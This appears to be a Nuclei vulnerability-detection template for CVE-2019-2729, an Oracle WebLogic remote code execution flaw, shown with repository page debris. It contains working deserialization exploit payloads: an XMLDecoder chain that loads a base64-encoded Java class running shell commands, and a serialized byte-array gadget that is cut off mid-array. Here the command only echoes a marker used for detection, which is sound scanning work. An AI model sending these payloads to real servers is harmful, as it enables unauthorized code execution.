61 lines
145 KiB
YAML
61 lines
145 KiB
YAML
|
id: CVE-2019-2729
|
||
|
|
||
|
info:
|
||
|
name: Oracle WebLogic Server Administration Console - Remote Code Execution
|
||
|
author: igibanez
|
||
|
severity: critical
|
||
|
description: |
|
||
|
The Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services) versions 0.3.6.0.0, 12.1.3.0.0 and 12.2.1.3.0 contain an easily exploitable vulnerability that allows unauthenticated attackers with network access via HTTP to compromise Oracle WebLogic Server.
|
||
|
reference:
|
||
|
- https://www.oracle.com/security-alerts/alert-cve-2019-2729.html
|
||
|
- https://nvd.nist.gov/vuln/detail/CVE-2019-2729
|
||
|
- http://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2729-5570780.html
|
||
|
- http://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html
|
||
|
classification:
|
||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||
|
cvss-score: 9.8
|
||
|
cve-id: CVE-2019-2729
|
||
|
cwe-id: CWE-284
|
||
|
epss-score: 0.9715
|
||
|
tags: cve,cve2019,oracle,rce,weblogic
|
||
|
|
||
|
http:
|
||
|
- raw:
|
||
|
- |
|
||
|
POST /wls-wsat/CoordinatorPortType HTTP/1.1
|
||
|
Host: {{Hostname}}
|
||
|
Content-Type: text/xml
|
||
|
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
|
||
|
|
||
|
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"><soapenv:Header><wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java><class><string>org.slf4j.ext.EventData</string><void><string><![CDATA[<java><void class="sun.misc.BASE64Decoder"><void method="decodeBuffer" id="byte_arr"><string>yv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9TdHJpbmc7AQABcAEAE0xqYXZhL2xhbmcvUHJvY2VzczsBAANmaXMBABVMamF2YS9pby9JbnB1dFN0cmVhbTsBAANpc3IBABtMamF2YS9pby9JbnB1dFN0cmVhbVJlYWRlcjsBAAJicgEAGExqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyOwEABGxpbmUBAAZyZXN1bHQBAA1TdGFja01hcFRhYmxlBwBRBwBSBwBTBwBCBwBEAQAKRXhjZXB0aW9ucwEAB2RvX2V4ZWMBAAFlAQAVTGphdmEvaW8vSU9FeGNlcHRpb247BwBNBwBUAQAEbWFpbgEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYBAARhcmdzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEAClNvdXJjZUZpbGUBAChSZXN1bHRCYXNlRXhlYy5qYXZhIGZyb20gSW5wdXRGaWxlT2JqZWN0DAAVABYHAFUMAFYAVwwAWABZBwBSDABaAFsBABlqYXZhL2lvL0lucHV0U3RyZWFtUmVhZGVyDAAVAFwBABZqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyDAAVAF0BAAAMAF4AXwEAF2phdmEvbGFuZy9TdHJpbmdCdWlsZGVyDABgAGEMAGIAXwEAC2NtZC5leGUgL2MgDAAcAB0BABNqYXZhL2lvL0lPRXhjZXB0aW9uAQALL2Jpbi9zaCAtYyABAA5SZXN1bHRCYXNlRXhlYwEAEGphdmEvbGFuZy9PYmplY3QBABBqYXZhL2xhbmcvU3RyaW5nAQARamF2YS9sYW5nL1Byb2Nlc3MBABNqYXZhL2lvL0lucHV0U3RyZWFtAQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAYKExqYXZhL2lvL0lucHV0U3RyZWFtOylWAQATKExqYXZhL2lvL1JlYWRlcjspVgEACHJlYWRMaW5lAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAAZhcHBlbmQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcjsBAAh0b1N0cmluZwAhABMAFAAAAAAABAABABUAFgABABcAAAAvAAEAAQAAAAUqtwABsQAAAAIAGAAAAAYAAQAAAAMAGQAAAAwAAQAAAAUAGgAbAAAACQAcAB0AAgAXAAAA+QADAAcAAABOuAACKrYAA0wrtgAETbsABVkstwAGTrsAB1kttwAIOgQBOgUSCToGGQS2AApZOgXGABy7AAtZtwAMGQa2AA0ZBbYADbYADjoGp//fGQawAAAAAwAYAAAAJgAJAAAABgAIAAcADQAIABYACQAgAAoAIwALACcADAAyAA4ASwARABkAAABIAAcAAABOAB4AHwAAAAgARgAgACEAAQANAEEAIgAjAAIAFgA4ACQAJQADACAALgAmACcABAAjACsAKAAfAAUAJwAnACkAHwAGACoAAAAfAAL/ACcABwcAKwcALAcALQcALgcALwcAKwcAKwAAIwAwAAAABAABABEACQAxAB0AAgAXAAAAqgACAAMAAAA3EglMuwALWbcADBIPtgANKrYADbYADrgAEEynABtNuwALWbcADBIStgANKrYADbYADrgAEEwrsAABAAMAGgAdABEAAwAYAAAAGgAGAAAAFgADABkAGgAeAB0AGwAeAB0ANQAfABkAAAAgAAMAHgAXADIAMwACAAAANwAeAB8AAAADADQAKQAfAAEAKgAAABMAAv8AHQACBwArBwArAAEHADQXADAAAAAEAAEANQAJADYANwACABcAAAArAAAAAQAAAAGxAAAAAgAYAAAABgABAAAANgAZAAAADAABAAAAAQA4ADkAAAAwAAAABAABADUAAQA6AAAAAgA7</string></void></void><void class="org.mozilla.classfile.DefiningClassLoader"><void method="defineClass"><string>ResultBaseExec</string><object idref="byte_arr"></object><void method="newInstance"><void method="do_exec" id="result"><string>echo${IFS}COP-9272-9102-EVC|rev</string></void></void></void></void><void class="java.lang.Thread" method="currentThread"><void method="getCurrentWork" id="current_work"><void method="getClass"><void method="getDeclaredField"><string>connectionHandler</string><void method="setAccessible"><boolean>true</boolean></void><void method="get"><object idref="current_work"></object><void method="getServletRequest"><void method="getResponse"><void method="getServletOutputStream"><void method="writeStream"><object class="weblogic.xml.util.StringInputStream"><object idref="result"></object></object></void><void method="flush"/></void><void method="getWriter"><void method="write"><string></string></void></void></void></void></void></void></void></void></void></java>]]></string></void></class></java></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>
|
||
|
|
||
|
- |
|
||
|
POST /_async/AsyncResponseService HTTP/1.1
|
||
|
Host: {{Hostname}}
|
||
|
Content-Type: text/xml
|
||
|
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
|
||
|
|
||
|
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"><soapenv:Header><wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java><array method="forName"><string>oracle.toplink.internal.sessions.UnitOfWorkChangeSet</string><void><array class="byte" length="3478"><void index="0"><byte>-84</byte></void><void index="1"><byte>-19</byte></void><void index="2"><byte>0</byte></void><void index="3"><byte>5</byte></void><void index="4"><byte>115</byte></void><void index="5"><byte>114</byte></void><void index="6"><byte>0</byte></void><void index="7"><byte>23</byte></void><void index="8"><byte>106</byte></void><void index="9"><byte>97</byte></void><void index="10"><byte>118</byte></void><void index="11"><byte>97</byte></void><void index="12"><byte>46</byte></void><void index="13"><byte>117</byte></void><void index="14"><byte>116</byte></void><void index="15"><byte>105</byte></void><void index="16"><byte>108</byte></void><void index="17"><byte>46</byte></void><void index="18"><byte>76</byte></void><void index="19"><byte>105</byte></void><void index="20"><byte>110</byte></void><void index="21"><byte>107</byte></void><void index="22"><byte>101</byte></void><void index="23"><byte>100</byte></void><void index="24"><byte>72</byte></void><void index="25"><byte>97</byte></void><void index="26"><byte>115</byte></void><void index="27"><byte>104</byte></void><void index="28"><byte>83</byte></void><void index="29"><byte>101</byte></void><void index="30"><byte>116</byte></void><void index="31"><byte>-40</byte></void><void index="32"><byte>108</byte></void><void index="33"><byte>-41</byte></void><void index="34"><byte>90</byte></void><void index="35"><byte>-107</byte></void><void index="36"><byte>-35</byte></void><void index="37"><byte>42</byte></void><void index="38"><byte>30</byte></void><void index="39"><byte>2</byte></void><void index="40"><byte>0</byte></void><void index="41"><byte>0</byte></void><void index="42"><byte>120</byte></void><void index="43"><byte>114</byte></void><void index="44"><byte>0</byte></void><void index="45"><byte>17</byte></void><void index="46"><byte>106</byte></void><void index="47"><byte>97</byte></void><void index="48"><byte>118</byte></void><void index="49"><byte>97</byte></void><void index="50"><byte>46</byte></void><void index="51"><byte>117</byte></void><void index="52"><byte>116</byte></void><void index="53"><byte>105</byte></void><void index="54"><byte>108</byte></void><void index="55"><byte>46</byte></void><void index="56"><byte>72</byte></void><void index="57"><byte>97</byte></void><void index="58"><byte>115</byte></void><void index="59"><byte>104</byte></void><void index="60"><byte>83</byte></void><void index="61"><byte>101</byte></void><void index="62"><byte>116</byte></void><void index="63"><byte>-70</byte></void><void index="64"><byte>68</byte></void><void index="65"><byte>-123</byte></void><void index="66"><byte>-107</byte></void><void index="67"><byte>-106</byte></void><void index="68"><byte>-72</byte></void><void index="69"><byte>-73</byte></void><void index="70"><byte>52</byte></void><void index="71"><byte>3</byte></void><void index="72"><byte>0</byte></void><void index="73"><byte>0</byte></void><void index="74"><byte>120</byte></void><void index="75"><byte>112</byte></void><void index="76"><byte>119</byte></void><void index="77"><byte>12</byte></void><void index="78"><byte>0</byte></void><void index="79"><byte>0</byte></void><void index="80"><byte>0</byte></void><void index="81"><byte>16</byte></void><void index="82"><byte>63</byte></void><void index="83"><byte>64</byte></void><void index="84"><byte>0</byte></void><void index="85"><byte>0</byte></void><void index="86"><byte>0</byte></void><void index="87"><byte>0</byte></void><void index="88"><byte>0</byte></void><void index="89"><byte>2</byte></void><void index="90"><byte>115</byte></void><void index="91"><byte>114</byte></void><void inde
|
||
|
|
||
|
- |
|
||
|
GET /_async/favicon.ico HTTP/1.1
|
||
|
Host: {{Hostname}}
|
||
|
|
||
|
stop-at-first-match: true
|
||
|
req-condition: true
|
||
|
matchers-condition: or
|
||
|
matchers:
|
||
|
- type: dsl
|
||
|
dsl:
|
||
|
- 'status_code_1 == 200'
|
||
|
- 'contains(body_1, "CVE-2019-2729-POC")'
|
||
|
condition: and
|
||
|
|
||
|
- type: dsl
|
||
|
dsl:
|
||
|
- 'status_code_2 == 202'
|
||
|
- 'contains(body_3, "Vulnerable")'
|
||
|
condition: and
|
||
|
|
||
|
# Enhanced by mp on 2022/04/14
|